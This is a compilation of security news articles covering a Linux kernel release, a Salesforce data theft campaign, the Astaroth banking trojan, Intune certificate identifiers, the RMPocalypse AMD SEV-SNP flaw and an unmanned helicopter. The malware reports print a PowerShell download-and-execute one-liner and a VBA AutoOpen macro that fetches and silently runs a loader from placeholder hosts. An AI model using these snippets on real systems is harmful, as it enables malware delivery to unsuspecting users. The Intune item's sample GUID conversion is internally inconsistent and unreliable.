• Linus Torvalds has announced the release of Linux 6.18-rc1, marking the start of the release candidate phase for the upcoming kernel version.

    In his typical straightforward style, Torvalds noted that the merge window concluded smoothly after two weeks, with the new candidate tagged and pushed out to developers and testers worldwide.

    This iteration appears unremarkable in scale, sitting comfortably in the middle of recent release sizes, and the shortlog of merges reveals no glaring anomalies.

    The bulk of changes, about half the diffstat, centers on drivers, reflecting the kernel’s ongoing evolution to support a widening array of hardware.

    The remainder spans virtual file systems (VFS) and filesystems, architecture updates (heavily influenced by device tree enhancements, which blur into driver territory), tooling improvements, and continued Rust integration for kernel modules.

    Torvalds highlighted a positive note: this was one of those rare merge windows where he avoided bisecting issues on his test machines, suggesting broader stability might follow suit as testing intensifies.

    Linux Kernel 6.18-rc1 Released

    Driver updates dominate, with contributions from maintainers like Alex Williamson bolstering VFIO for virtual function I/O, essential for virtualization environments.

    Greg Kroah-Hartman handled a swath of peripheral drivers, including USB, Thunderbolt, and staging code, while Bjorn Helgaas patched PCI fixes to ensure reliable device enumeration.

    Graphics saw Dave Airlie’s DRM updates and fixes, vital for modern displays and GPUs. Architecture-specific work includes Borislav Petkov’s extensive x86 overhaul, covering instruction decoders, microcode loading, and mitigations for vulnerabilities like Spectre.

    Arm64 and RISC-V received tweaks from Will Deacon and Paul Walmsley, respectively, aiding embedded and server deployments.

    Power management, under Rafael Wysocki, refined ACPI and thermal controls, optimizing energy efficiency across laptops and data centers.

    Networking and I/O layers advanced too, with Paolo Abeni’s updates to core networking stacks and Jens Axboe’s io_uring enhancements for asynchronous operations, boosting performance in high-throughput applications.

    Filesystems and Security

    VFS saw significant polishing from Al Viro and Christian Brauner, including mount updates, inode handling, and Rust bindings to modernize file operations.

    Filesystems like ext4 (Ted Ts’o), Btrfs (David Sterba), and XFS (Carlos Maiolino) incorporated fixes and optimizations for data integrity and speed.

    Security remains a priority, with Kees Cook’s hardening efforts, seccomp refinements, and Eric Biggers’ fscrypt and crypto library updates, including interleaved SHA-256 support.

    BPF from Alexei Starovoitov added fixes for eBPF programs, enhancing kernel observability without compromising safety. Paul McKenney’s RCU tweaks and Thomas Gleixner’s IRQ and timer core updates ensure low-latency responsiveness, crucial for real-time systems.

    This rc1 signals a kernel maturing toward broader hardware support and developer tools, with Rust’s foothold promising safer code.

    While no blockbuster features emerge, the cumulative refinements spanning over 100 contributors fortify Linux’s position in servers, mobiles, and IoT.

    Testers are urged to hammer it with workloads; full stability could arrive by December, barring regressions. As Torvalds quips, hoping his smooth ride extends to the ecosystem, 6.18 looks poised for a solid release.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Linux Kernel 6.18-rc1 Released With Extensive Updates Following a Steady Merge Window appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Scattered Lapsus$ Hunters, a threat group previously associated with high-profile data thefts, recently claimed responsibility for exfiltrating over one billion records from Salesforce environments worldwide.

    Emerging in mid-2025, the group has honed its tactics to exploit misconfigurations in cloud identities and exposed APIs.

    Initial reports surfaced when multiple Salesforce customers observed anomalous queries against their customer relationship management (CRM) instances late at night, suggesting the presence of an automated extraction tool.

    As forensic logs accumulated, investigators realized that the volume and scope of data accessed far exceeded previous intrusions.

    In this latest campaign, attackers leveraged a combination of targeted phishing lures and credential stuffing to gain initial footholds.

    Bling Libra’s Salesforce data leak site (Source – Palo Alto Networks)

    Victims reported receiving authentic-looking emails prompting mandatory security updates, which delivered a malicious Office macro.

    Once executed, the macro reached out to a remote command-and-control server to install a lightweight loader.

    Palo Alto Networks analysts noted that this loader was written in Go and compiled with stripped symbols, making reverse engineering more challenging.

    The loader subsequently validated API tokens and initiated a multi-stage data harvesting routine.

    The impact of this breach extends beyond exposed personal data; proprietary sales strategies, pipeline forecasts, and sensitive client negotiations have all come under threat.

    Many organizations rely heavily on Salesforce for mission-critical operations, meaning any compromise can lead to operational disruptions and reputational harm.

    Early estimates suggest that the group may have extracted data at a sustained rate of over 500 gigabytes per hour, exfiltrating records in batches via encrypted channels to avoid detection.

    Infection Mechanism

    A closer look at the infection mechanism reveals a strategic emphasis on stealth and persistence.

    After the initial macro dropper executes, a PowerShell script stager is launched through a one-liner such as:-

    powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {IEX ((New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1'))}"

    This stager checks for sandbox indicators before retrieving the full Go-based loader. The loader then decrypts credentials stored in the Windows Credential Manager using the CredRead API and authenticates to the Salesforce REST API with the lowest-privilege service account that meets the data access requirements.

    Once authenticated, the malware enumerates object schemas and dynamically constructs SOQL queries to retrieve and batch records. Each batch is buffered in memory and encrypted with ChaCha20 before being transmitted over HTTPS to a dedicated exfiltration endpoint.

    To ensure persistence, the malware registers a scheduled task named UpdaterSvc that triggers every two hours. This task validates the presence of the loader binary, re-downloads it if altered, and resumes extraction from the last successful record ID.

    The group’s meticulous approach to API rate-limit evasion and credential harvesting underscores an advanced understanding of cloud-native environments.

    By combining sophisticated social engineering, custom tooling, and resilient persistence tactics, Scattered Lapsus$ Hunters have demonstrated a formidable capability to compromise enterprise Salesforce instances at scale.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Scattered Lapsus$ Hunters Claim to Have Stolen More Than 1 Billion Salesforce Records appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Sikorsky’s newest helicopter is an unmanned version of its UH-60L Black Hawk, stripped of its cockpit to carry more cargo and keep aircrew out of harm’s way. Company officials hope the U.S. and other militaries see the remotely piloted U-HAWK as a useful new variant of the venerable airframe.

    The cockpit is replaced by clamshell doors and a ramp, and the pilots with the company’s MATRIX autonomous technology, enabling a ground operator to fly the aircraft with a tablet.

    “We can take those highly trained crews and very valuable crews and focus them on those critical missions that are in direct support of soldiers, seamen, airmen, and then kind of the mundane or really dangerous or dull task we can assign to the autonomous capabilities,” said 

    Erskine “Ramsey” Bentley, director of strategy and business development for Sikorsky Advanced Programs, which debuted the yet-to-be-flown aircraft on Monday at the Association of the U.S. Army’s conference in Washington, D.C.

    The announcement, and push to keep the helicopter relevant, follows Army Chief of Staff Randy George’s congressional testimony that the service may retire its aging UH-60L, introduced in 1989. In 2022, the Army chose Textron’s Bell V-280 to potentially replace thousands of the Army’s workhorse helicopters.

    Sikorsky, a Lockheed Martin subsidiary, has been testing its MATRIX system on unmanned Black Hawk helicopters for at least a decade. Company representatives said they’ve wanted to move fast on U-HAWK, getting an aircraft ready to debut at the show in just 10 months. Flight testing is set to begin within the first half of 2026.

    “We have gone from concept to design to actually reworking the aircraft and rebuilding the aircraft in under a year,” Bentley said. “We plan to be turning rotors this spring, and we're looking at first flight in the second quarter of the year.”

    Bentley said by building U-HAWK on the older UH-60L the company can cut down on costs as well as maintenance for the Army.

    “We're really looking at different ways to extend the life of the aircraft,” Bentley said. “We really didn't do a lot of changes … You're talking about the same transmissions, same engines, same rotor blades, etc. It's not like we're introducing a new aircraft and a new platform into the Army inventory.”

    By losing the cockpit and crew chief stations, the U-HAWK can be equipped for a variety of cargo such as four Joint Modular Intermodal Containers or a HIMARS pod of six rockets. Uncrewed ground vehicles, such as the robotic HDT Hunter Wolf can be driven on and off the ramp of the aircraft. Company officials also said a munitions quiver can be secured to the cabin of the helicopter to fire armed missiles or sensors. 

    Company representatives have said there’s not a specific customer or contract in mind for the U-HAWK. 

    The U-HAWK announcement comes one year after the company received a $6 million award from the Defense Advanced Research Projects Agency to install its MATRIX flight autonomy system on the Army’s UH-60M Black Hawk helicopter. That same technology was placed on all five drone designs for DARPA’s shipboard unmanned aerial systems demonstrations.

    Sikorsky isn’t the only company pursuing autonomous flight on Black Hawks. In April, the Army selected Near Earth Autonomy and Honeywell to lead a $15 million program to equip UH-60Ls for unmanned logistics missions.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The online cybercrime marketplace, Russian Market, has evolved from selling Remote Desktop Protocol (RDP) access to becoming one of the most active underground hubs for information-stealing malware logs. Stolen user credentials are traded daily, and each compromised login represents a potential gateway into corporate systems. Threat actors routinely purchase credentials to launch credential-based attacks that […]

    The post Russian Cybercrime Marketplace Shifting from RDP Access to Malware Stealer Log Exploits appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • New research uncovers valuable insights hidden within Microsoft Intune’s Mobile Device Management (MDM) certificates, offering a more reliable way to verify device and tenant identities compared to traditional methods like registry values.

    These certificates, issued to enrolled devices, contain Object Identifiers (OIDs) that, when properly decoded, reveal unique GUIDs for the MDM Device ID and Entra ID Tenant ID, enhancing trust in device authentication.

    This discovery, detailed by Ben Whitmore, highlights how endpoint managers can leverage cryptographic data for robust identity confirmation in enterprise environments.​

    The Intune MDM certificate ensures secure communication between devices and the Intune service, embedding non-human-readable extensions that hold critical identifiers.

    Researchers identified two key OIDs: 1.2.840.113556.5.4 for the MDM Device ID and 1.2.840.113556.5.14 for the Entra ID Tenant ID, both stored as mixed little-endian and big-endian byte arrays requiring specific reordering to form readable GUIDs.

    Unlike registry values, which can be tampered with easily, these certificate-bound identifiers provide a chain of trust backed by Microsoft’s certification authorities.

    Hidden OIDs in MDM Certificates

    For instance, the certificate’s properties, visible in tools like certmgr.msc, show byte arrays that must be rearranged to unlock their meaning, offering IT admins a tamper-resistant alternative for auditing device enrollment.

    Extracting meaningful data from these OIDs involves a precise byte reordering process, often discovered through trial and error.

    For the MDM Device ID (OID 1.2.840.113556.5.4), the first four bytes are reversed, followed by reversals of the next two pairs, while the final six bytes remain unchanged; using example bytes 12 34 56 78 9A BC DE F0 12 34 56 78 90 AB CD EF yields the GUID 78563412-BC9A-F0DE-1234-567890ABCDEF after transformation.

    Similarly, the Entra ID Tenant ID (OID 1.2.840.113556.5.14) follows a variant pattern with eight unchanged final bytes, converting sample data A1 B2 C3 D4 E5 F6 12 34 56 78 9A BC DE F0 01 23 A1 into F6E5D4C3-F6E5-3412-5678-9ABCDEF00123A1.

    This method ensures high-confidence verification, as the data originates from trusted issuers like the Microsoft Intune MDM Device CA, reducing risks from modifiable system artifacts.

    To streamline this process, developers at MSEndpointMgr released a PowerShell script, Get-TenantInformation.ps1, available on GitHub, which automates certificate discovery and decoding across LocalMachine and user profile stores.

    The script searches for certificates issued by the Microsoft Intune MDM Device CA or MS-Organization-Access, validates their chain against expected root and intermediate authorities, and checks private key exportability using certutil for Key Storage Provider details.

    It processes OIDs like 1.2.840.113556.5.4 and 1.2.840.113556.5.14, reassembling bytes into GUIDs while outputting comprehensive details, including thumbprint, issuer, and trust status, according to Ben Whitmore.

    Running as admin reveals whether keys are TPM-protected, indicated by “Microsoft Platform Crypto Provider” versus software-only on older devices, flagging potential vulnerabilities.

    This tool empowers admins to audit Entra ID join types and tenant regions from extensions like 1.2.840.113556.1.5.284.7, fostering proactive security management.

    By prioritizing certificate OIDs over less secure alternatives, organizations can build stronger device identity assurance, akin to choosing premium authentication over basic checks.

    This approach not only elevates trust but also aids in threat detection by confirming legitimate tenant associations. As Intune evolves, such techniques will prove essential for maintaining endpoint integrity.​

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Microsoft Intune MDM and Entra ID Leveraged to Elevate your Trust in Device Identity appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Every week, the cyber world reminds us that silence doesn’t mean safety. Attacks often begin quietly — one unpatched flaw, one overlooked credential, one backup left unencrypted. By the time alarms sound, the damage is done. This week’s edition looks at how attackers are changing the game — linking different flaws, working together across borders, and even turning trusted tools into weapons.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In September 2025, Kandji’s security researchers uncovered a sophisticated campaign in which attackers deployed multiple spoofed Homebrew installer sites that perfectly mimic the official brew.sh page. These counterfeit domains served a hidden malicious payload under the guise of the standard Homebrew installation script. This exposé delves into the tactics, infrastructure, and impact of this alarming […]

    The post Hackers Target macOS Users with Fake Homebrew Websites to Deliver Malicious Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new wave of the Astaroth banking trojan has emerged, leveraging a novel approach to distribute its malicious configuration files.

    First detected in late 2025, this latest campaign employs GitHub’s raw content service to host encrypted JSON configurations containing target URLs, browser injection parameters, and command-and-control (C2) endpoints.

    By hiding critical settings behind GitHub’s trusted domain, Astaroth evades conventional network-based detections and blends seamlessly with routine developer traffic.

    Delivery remains consistent with previous outbreaks, relying on spear-phishing emails that contain malicious Word documents outfitted with obfuscated macros and decoy content to dupe analysts.

    Early victims report receiving emails purporting to be from financial institutions or corporate partners, often citing urgent invoice discrepancies.

    Opening the attached document triggers a Visual Basic for Applications (VBA) macro that downloads a lightweight .NET loader from a remote site.

    Once executed, the loader reaches out to GitHub’s raw content URLs to fetch the next-stage configuration, which is then decrypted in memory before spawning multiple threads for web injection and credential harvesting.

    McAfee researchers noted that by using GitHub as a distribution point, the malware bypasses static allow-lists and hides in plain sight of endpoint protection platforms, significantly extending its window of operation.

    Targeted primarily at European and North American banking customers, Astaroth’s impact includes unauthorized fund transfers, credential theft across multiple online banking portals, and in certain cases ransomware deployment for lateral movement.

    Advanced Configuration Management Through GitHub Infrastructure

    Victims remain unaware of the infection for weeks, as the malware employs both process hollowing and parent-child process masquerading to avoid sandbox detection.

    Files dropped to disk are minimal, and registry entries masquerade as legitimate Microsoft Office components, complicating forensic analysis for security teams.

    Infection chain (Source – McAfee)

    Delving into the infection mechanism reveals a sophisticated multi-stage process designed for stealth and reliability.

    Upon opening the malicious Word document, the embedded macro executes the following sequence:-

    Sub AutoOpen()
        Dim objHTTP As Object
        Dim strURL As String
        Dim strTemp As String
    
        Set objHTTP = CreateObject("MSXML2.XMLHTTP")
        strURL = "https://example.com/loader.exe"
        objHTTP.Open "GET", strURL, False
        objHTTP.Send
    
        strTemp = Environ("TEMP") & "\ldr.exe"
        If objHTTP.Status = 200 Then
            Set objFSO = CreateObject("Scripting.FileSystemObject")
            Set objFile = objFSO.CreateTextFile(strTemp, True)
            objFile.Write objHTTP.responseBody
            objFile.Close
            CreateObject("WScript.Shell").Run strTemp, 0, False
        End If
    End Sub

    Once ldr.exe executes, it invokes the following .NET routine to fetch and decrypt the GitHub-hosted configuration:

    var url = "https://raw.githubusercontent.com/user/repo/main/config.dat";
    using var wc = new WebClient();
    byte[] data = wc.DownloadData(url);
    byte[] decrypted = DecryptConfig(data, key);
    var configJson = Encoding.UTF8.GetString(decrypted);

    This mechanism illustrates Astaroth’s reliance on legitimate infrastructure to obscure malicious intent, complicating the ability of network defenders to discriminate between benign and malicious traffic.

    Continuous monitoring of unusual GitHub raw content access from non-developer endpoints is now recommended as a key detection strategy.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Astaroth Banking Malware Leveraging GitHub to Host Malware Configurations appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In September, a nascent pro-Russian hacktivist group known as TwoNet staged its first operational technology and industrial control systems (OT/ICS) intrusion against our water treatment utility honeypot. By exploiting default credentials and SQL-based schema extraction, the adversary ultimately created backdoor accounts and defaced the human-machine interface (HMI), demonstrating a concerning pivot from pure DDoS to […]

    The post Pro-Russian Hacktivist Targets OT/ICS Systems to Harvest Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical vulnerability in AMD’s Secure Encrypted Virtualization with Secure Nested Paging (SEV-SNP), a cornerstone of confidential computing deployed by major cloud providers like AWS, Azure, and Google Cloud.

    Dubbed RMPocalypse, the attack exploits a flaw in the initialization of the Reverse Map Table (RMP), which enforces memory integrity to prevent hypervisors from tampering with encrypted virtual machines (VMs).

    This breakthrough, detailed in a paper presented at the ACM Conference on Computer and Communications Security (CCS) 2025 in Taipei, allows malicious hypervisors to corrupt RMP entries, shattering SEV-SNP’s guarantees of data confidentiality and integrity.

    The vulnerability, tracked as CVE-2025-0033, stems from a “Catch-22” in RMP setup: the table must protect itself, but during bootstrapping, AMD’s Platform Security Processor (PSP) fails to fully isolate it from interfering with x86 cores.

    Disclosed to AMD on February 3, 2025, the issue affects Zen 3, Zen 4, and Zen 5 processors, including EPYC server chips used in production environments.rmpocalypse-CCS2025.pdf​

    Flaw In RMP Initialization Exposed

    At the heart of SEV-SNP is the RMP, a massive data structure up to 16GB for large DRAM setups that maps host physical addresses to guest virtual addresses, blocking attacks like page swapping seen in predecessors SEV and SEV-ES.

    Normally, the RMP self-protects by denying hypervisor mappings to its own pages, but initialization poses a dilemma: no RMP exists yet to enforce this.

    The PSP, an ARM-based coprocessor, handles setup by creating barriers, Trusted Memory Regions (TMRs) at the memory controller, and x86 core locks to block writes during this phase.

    However, researchers Benedict Schlüter and Shweta Shinde from ETH Zurich found these barriers incomplete. Asynchronous timing allows x86 cores to create dirty cache lines in RMP memory before full protection activates.

    Once TMRs are lifted post-initialization, these stale entries flush to DRAM, overwriting RMP state with arbitrary values.

    Experiments on EPYC 9135 (Zen 5), 9124 (Zen 4), and 7313 (Zen 3) confirmed overwrites succeed without triggering faults, as coherency issues in Zen 3 exacerbate the problem.

    The PSP’s source code hints at intended safeguards, like cache flushes, but proprietary OS components and missing TLB invalidations leave gaps.

    RMPocalypse’s corruption primitive unlocks full compromise of SEV-SNP VMs. Attackers can transition RMP-protected pages, firmware, context, guest-valid, and VMSA states to hypervisor-writable, enabling four key exploits.

    Attack Overview
    Attack Overview

    First, forging attestation reports by replaying benign context page ciphertexts tricks guests into trusting malicious VMs, bypassing integrity checks since context pages lack encryption integrity.

    Second, enabling debug mode on production confidential VMs (CVMs) flips a policy bit in the context page, granting hypervisors read/write access via SNPDEBUGDECRYPT/ENCRYPT APIs undetected as attestation remains unaltered.

    Success rates exceed 99.9% in under 15 milliseconds after multiple trials. Third, VMSA state replay resets CVM registers to prior snapshots, breaking execution integrity for rollback attacks.

    Finally, arbitrary code injection targets guest pages: using SNPPAGEMOVE to swap tweak values, attackers replay IO-channel payloads (e.g., network packets) into kernel code, evading encryption tweaks.

    End-to-end, this takes about 5 milliseconds, including KASLR breaks. These primitives render SEV-SNP useless against untrusted hypervisors, exposing sensitive data like AI models or enterprise workloads to exfiltration and tampering.

    Mitigations

    AMD acknowledged the flaw and is working on fixes, but no patches exist yet for affected hardware.

    Researchers propose aligning barriers at the core level to check caches pre-TMR lift, or forcing global cache/TLB flushes post-RMP setup, though Zen 3’s domain incoherency demands extra invalidations.

    Firmware checks on RMP self-protection could hinder exploits via TOCTOU detection, albeit with overhead.

    As confidential computing grows, RMPocalypse joins side-channels like CacheWarp and Heckler, highlighting SEV-SNP’s fragility despite its post-SEV-ES hardening.

    Cloud tenants must audit providers for updates, while AMD’s partial open-sourcing of PSP firmware aids scrutiny but underscores proprietary risks.

    This attack, exploitable in under 234 milliseconds during SNPINITEX, urges reevaluation of hardware roots of trust.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post New RMPocalypse Attack Let Hackers Break AMD SEV-SNP To Exfiltrate Confidential Data appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶